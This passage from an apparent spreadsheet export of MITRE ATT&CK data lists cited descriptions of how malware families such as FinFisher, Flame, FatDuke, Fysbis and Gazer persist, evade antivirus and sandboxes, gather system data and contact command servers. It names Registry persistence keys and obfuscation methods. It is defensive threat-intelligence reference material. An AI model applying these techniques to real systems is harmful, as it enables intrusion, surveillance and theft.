    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) uses Rundll32 for executing the dropper program.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) checks for installed security software like antivirus and firewall.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) creates a .LNK file for persistence.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) collects the victim’s computer name, processor architecture, OS version, volume serial number, and system type.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) collects information about the network including the IP address and DHCP server.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) collects the username from the victim’s machine.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) gathers the time zone information from the victim’s machine.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) uses HTTP and HTTPS to communicate with the C2 server.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) executes batch scripts on the victim’s machine, and can launch a reverse shell for command execution.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) uses WMI to query the Windows Registry.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) employs the same encoding scheme as [SPACESHIP](https://attack.mitre.org/software/S0035) for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) searches for interesting files (either a default or customized set of file extensions) on the local system. [FLASHFLOOD](https://attack.mitre.org/software/S0036) will scan the My Recent Documents, Desktop, Temporary Internet Files, and TEMP directories. [FLASHFLOOD](https://attack.mitre.org/software/S0036) also collects information stored in the Windows Address Book.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) searches for interesting files (either a default or customized set of file extensions) on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by [SPACESHIP](https://attack.mitre.org/software/S0035).(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) searches for interesting files (either a default or customized set of file extensions) on the local system and removable media.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) stages data it copies from the local system or removable drives in the "%WINDIR%\$NtUninstallKB885884$\" directory.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) achieves persistence by making an entry in the Registry's Run key.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLIPSIDE](https://attack.mitre.org/software/S0173) uses RDP to tunnel traffic from a victim environment.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[FTP](https://attack.mitre.org/software/S0095) may be used to exfiltrate data separate from the main command and control protocol.(Citation: Wikipedia FTP)</t>
  </si>
  <si>
    <t>[FakeM](https://attack.mitre.org/software/S0076) contains a keylogger module.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>Some variants of [FakeM](https://attack.mitre.org/software/S0076) use SSL to communicate with C2 servers.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[FakeM](https://attack.mitre.org/software/S0076) C2 traffic attempts to evade detection by resembling data generated by legitimate messenger applications, such as MSN and Yahoo! messengers. Additionally, some variants of [FakeM](https://attack.mitre.org/software/S0076) use modified SSL code for communications back to C2 servers, making SSL decryption ineffective.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>The original variant of [FakeM](https://attack.mitre.org/software/S0076) encrypts C2 traffic using a custom encryption cipher that uses an XOR key of “YHCRA” and bit rotation between each XOR operation. Some variants of [FakeM](https://attack.mitre.org/software/S0076) use RC4 to encrypt C2 traffic.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has been packed with junk code and strings.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has the ability to create a process.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can copy files and directories from a compromised host.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can decrypt AES encrypted C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has used several C2 servers per targeted organization.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can secure delete its DLL.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can enumerate directories on target machines.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can used pipes to connect machines with restricted internet access to remote machines via other infected hosts.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has attempted to mimic a compromised user's traffic by using the same user agent as the installed browser.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can call &lt;code&gt;ShellExecuteW&lt;/code&gt; to open the default browser on the URL localhost.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can use base64 encoding, string stacking, and opaque predicates for obfuscation.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has the ability to execute PowerShell scripts.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can list running processes on the localhost.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can get user agent strings for the default browser from &lt;code&gt;HKCU\Software\Classes\http\shell\open\command&lt;/code&gt;.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has used &lt;code&gt;HKLM\SOFTWARE\Microsoft\CurrentVersion\Run&lt;/code&gt; to establish persistence.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can execute via rundll32.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has been regularly repacked by its operators to create large binaries and evade detection.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can AES encrypt C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can collect the user name, Windows version, computer name, and available space on discs from a compromised host.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can identify the MAC address on the target computer.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can turn itself on or off at random intervals.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) can be controlled via a custom C2 protocol over HTTP.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) can download files from remote servers.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) has masqueraded as legitimate Adobe Content Management System files.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) checks for processes associated with anti-virus vendors.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>Some [Felismus](https://attack.mitre.org/software/S0171) samples use a custom method for C2 traffic that utilizes Base64.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>Some [Felismus](https://attack.mitre.org/software/S0171) samples use a custom encryption method for C2 traffic that utilizes AES and multiple keys.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) collects the system information, including hostname and OS version, and sends it to the C2 server.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) collects the victim LAN IP address and sends it to the C2 server.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) collects the current username and sends it to the C2 server.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) uses HTTP for C2.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Felismus](https://attack.mitre.org/software/S0171) uses command line for execution.(Citation: Forcepoint Felismus Mar 2017)</t>
  </si>
  <si>
    <t>[Fgdump](https://attack.mitre.org/software/S0120) can dump Windows password hashes.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) contains junk code in its functions in an effort to confuse disassembly programs.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>Some [FinFisher](https://attack.mitre.org/software/S0182) variants incorporate an MBR rootkit.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) performs UAC bypass.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) clears the system event logs using &lt;code&gt; OpenEventLog/ClearEventLog APIs &lt;/code&gt;.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) hooks processes by modifying IAT pointers to CreateWindowEx.(Citation: FinFisher Citation)(Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>A [FinFisher](https://attack.mitre.org/software/S0182) variant uses DLL search order hijacking.(Citation: FinFisher Citation)(Citation: Securelist BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) uses DLL side-loading to load malicious programs.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) extracts and decrypts stage 3 malware, which is stored in encrypted resources.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) injects itself into various processes depending on whether it is low integrity or high integrity.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) enumerates directories and scans for certain files.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) is heavily obfuscated in many ways, including through the use of spaghetti code in its functions in an effort to confuse disassembly programs. It also uses a custom XOR algorithm to obfuscate code.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) checks its parent process for indications that it is running in a sandbox setup.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) queries Registry values as part of its anti-sandbox checks.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) establishes persistence by creating the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\Run&lt;/code&gt;.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) takes a screenshot of the screen and displays it on top of all other windows for few seconds in an apparent attempt to hide some messages showed by the system during the setup process.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) probes the system to check for antimalware processes.(Citation: FinFisher Citation)(Citation: Securelist BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>A [FinFisher](https://attack.mitre.org/software/S0182) variant uses a custom packer.(Citation: FinFisher Citation)(Citation: Securelist BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list in order to check for sandbox/virtualized environments.(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) checks if the victim OS is 32 or 64-bit.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) uses token manipulation with NtFilterToken as part of UAC bypass.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) creates a new Windows service with the malicious executable for persistence.(Citation: FinFisher Citation)(Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) uses Python code to deobfuscate base64-encoded strings.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) obfuscates strings with base64 encoding.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) obtains a list of running processes.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) creates a Registry Run key to establish persistence.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) obtains victim Microsoft Windows version information and CPU architecture.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Final1stspy](https://attack.mitre.org/software/S0355) uses HTTP for C2.(Citation: Unit 42 Nokki Oct 2018)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can record audio using any existing hardware recording devices.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)</t>
  </si>
  <si>
    <t>Authentication Package</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can use Windows Authentication Packages for persistence.(Citation: Crysys Skywiper)</t>
  </si>
  <si>
    <t>Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) has a module named BeetleJuice that contains Bluetooth functionality that may be used in different ways, including transmitting encoded information from the infected system over the Bluetooth protocol, acting as a Bluetooth beacon, and identifying other Bluetooth devices in the vicinity.(Citation: Symantec Beetlejuice)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can use MS10-061 to exploit a print spooler vulnerability in a remote system with a shared printer in order to move laterally.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can create backdoor accounts with login “HelpAssistant” on domain connected systems if appropriate rights are available.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using Autorun functionality.(Citation: Kaspersky Flame)</t>
  </si>
  <si>
    <t>Rundll32.exe is used as a way of executing [Flame](https://attack.mitre.org/software/S0143) at the command-line.(Citation: Crysys Skywiper)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) can take regular screenshots when certain applications are open that are sent to the command and control server.(Citation: Kaspersky Flame)</t>
  </si>
  <si>
    <t>[Flame](https://attack.mitre.org/software/S0143) identifies security software such as antivirus through the Security module.(Citation: Kaspersky Flame)(Citation: Kaspersky Flame Functionality)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) may obfuscate portions of the initial C2 handshake.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) enumerates the privilege level of the victim during the initial infection.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) will attempt to detect if a usable smart card is current inserted into a card reader.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) will attempt to detect anti-virus products during the initial infection.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used SEAL encryption during the initial C2 handshake.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) beacons out the victim operating system and computer name during the initial infection.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) enumerates the current user during the initial infection.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used HTTP for C2.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) leverages WMI to enumerate anti-virus on the victim.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>[FlawedGrace](https://attack.mitre.org/software/S0383) encrypts its C2 configuration files with AES in CBC mode.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[Forfiles](https://attack.mitre.org/software/S0193) can be used to act on (ex: copy, move, etc.) files/directories in a system during (ex: copy files into a staging area before).(Citation: Überwachung APT28 Forfiles June 2015)</t>
  </si>
  <si>
    <t>[Forfiles](https://attack.mitre.org/software/S0193) can be used to locate certain types of files/directories in a system.(ex: locate all files with a specific extension, name, and/or age)(Citation: Überwachung APT28 Forfiles June 2015)</t>
  </si>
  <si>
    <t>[Forfiles](https://attack.mitre.org/software/S0193) can be used to subvert controls and possibly conceal command execution by not directly invoking [cmd](https://attack.mitre.org/software/S0106).(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can XOR credit card information before exfiltration.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can collect elements related to credit card data from process memory.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can use DNS tunneling for exfiltration of credit card data.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can identifiy payment card track data on the victim and copy it to a local file in a subdirectory of C:\Windows\.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can enumerate and exclude selected processes on a compromised host to speed execution of memory scraping.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) will delete files on the system.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) looks for specific files and file types.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) saves itself with a leading "." to make it a hidden file.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) persists via a Launch Agent.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) executes and stores obfuscated Perl scripts.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) has the ability to list processes on the system.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) takes screenshots of the user's desktop.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has the ability to delete files.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t xml:space="preserve">[Fysbis](https://attack.mitre.org/software/S0410) has the ability to search for files.(Citation: Fysbis Dr Web Analysis) </t>
  </si>
  <si>
    <t xml:space="preserve">[Fysbis](https://attack.mitre.org/software/S0410) can perform keylogging.(Citation: Fysbis Palo Alto Analysis) </t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has masqueraded as the rsyncd and dbus-inotifier services.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has masqueraded as trusted software rsyncd and dbus-inotifier.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t xml:space="preserve">[Fysbis](https://attack.mitre.org/software/S0410) has been encrypted using XOR and RC4.(Citation: Fysbis Dr Web Analysis) </t>
  </si>
  <si>
    <t xml:space="preserve">[Fysbis](https://attack.mitre.org/software/S0410) can collect information about running processes.(Citation: Fysbis Dr Web Analysis) </t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) can use Base64 to encode its C2 traffic.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has used the command &lt;code&gt;ls /etc | egrep -e"fedora\*|debian\*|gentoo\*|mandriva\*|mandrake\*|meego\*|redhat\*|lsb-\*|sun-\*|SUSE\*|release"&lt;/code&gt; to determine which Linux OS version is running.(Citation: Fysbis Palo Alto Analysis)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has established persistence using a systemd service.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has the ability to create and execute commands in a remote shell for CLI.(Citation: Fysbis Palo Alto Analysis)</t>
  </si>
  <si>
    <t>XDG Autostart Entries</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has installed itself as an autostart entry under &lt;code&gt;~/.config/autostart/dbus-inotifier.desktop&lt;/code&gt; to establish persistence.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>[GLOOXMAIL](https://attack.mitre.org/software/S0026) communicates to servers operated by Google using the Jabber/XMPP protocol.(Citation: Mandiant APT1)(Citation: CyberESI GTALK)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a reconnaissance module that can be used to retrieve Windows domain membership information.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) is written in and executed as [JavaScript](https://attack.mitre.org/techniques/T1059/007).(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used PowerShell to execute the Meterpreter downloader TinyMet.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a persistence module that stores the implant inside the Registry, which executes at logon.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used &lt;code&gt;sctasks&lt;/code&gt; for persistence. (Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a screenshot module that can be used to take a screenshot of the remote system.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a reconnaissance module that can be used to retrieve information about a victim's computer, including the resolution of the workstation .(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a reconnaissance module that can be used to retrieve the date and time of the system.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) uses custom encryption for C2 that uses RSA.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) versions are signed with various valid certificates; one was likely faked and issued by Comodo for "Solid Loop Ltd," and another was issued for "Ultimate Computer Support Ltd."(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) has commands to delete files and persistence mechanisms from the victim.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can execute a task to download a file.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) stores configuration items in alternate data streams (ADSs) if the Registry is not accessible.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) logs its actions into files that are encrypted with 3DES. It also uses RSA to encrypt resources.(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) injects its communication module into an Internet accessible process through which it performs C2.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by creating a .lnk file in the Start menu.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by creating a scheduled task.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>Screensaver</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence through the system screensaver by configuring it to execute the malware.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) uses custom encryption for C2 that uses 3DES.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) obtains the current user's security identifier.(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>Thread Execution Hijacking</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) performs thread execution hijacking to inject its orchestrator into a running thread from a remote process.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>For early [Gazer](https://attack.mitre.org/software/S0168) versions, the compilation timestamp was faked.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) communicates with its C2 servers over HTTP.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by setting the value “Shell” with “explorer.exe, %malware_pathfile%” under the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt;.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information from the victim, including installed drivers, programs previously executed by users, programs and services configured to automatically run at startup, files and folders present in any user's home folder, files and folders present in any user's My Documents, programs installed to the Program Files folder, and recently accessed files, folders, and programs.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on local user accounts from the victim.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on running processes and environment variables from the victim.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
